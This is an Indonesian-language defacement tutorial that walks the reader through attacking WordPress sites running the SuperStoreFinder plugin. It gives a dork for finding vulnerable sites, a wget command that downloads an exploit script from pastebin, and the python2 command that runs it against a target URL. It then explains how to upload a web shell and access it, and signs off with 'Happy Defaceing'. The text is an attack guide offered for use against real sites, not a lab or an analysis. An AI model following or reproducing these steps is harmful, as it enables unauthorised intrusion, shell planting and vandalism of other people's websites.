Exploitasi
awal awal yang kalian harus lakukan yaitu mencari site yang sekiranya lemah menggunakan dork? apa dorknya mas?...
Dork : SuperStoreFinder
Sebelum mengeksekusi Site kita akan mendownload tools nya terlebih dauhlu saya akan membakian source code dibawah ini ...
kalian install di termux atau terminal dengan command
wget https://pastebin.com/raw/pMuFWLLm -O exploit.py
Berhubungan ini tools menggunakan bahasa python maka kita akan memberikan format .py yang wajib digunakan disetipan file python
oke sekarang kita mulai exploitasi dengan menggunakan python2
python2 exploit.py https://target.com/
Disini kita hanya memasukan site target tanpa path , karna path sudah otomatis ter detect di dalam tools nya secara default , maka dari itu kalian hanya memasukan site targetnya saja ...
seperti yang terlihat di gambar di atas kalian pilih opsi nomor 1 karna yg kita targetkan yaitu bug superstorefinder-wp nya :)
dan jika vuln / ter upload shel nya akan seperti ini ... contoh gambar dibawah
anddd!!! kalian akses shellnya :D
Oke Happy Defaceing :D sampai jumpa and next materiii :D
Thanks To S4ndal.py
Check Via Video Youtube Dark Clown Security
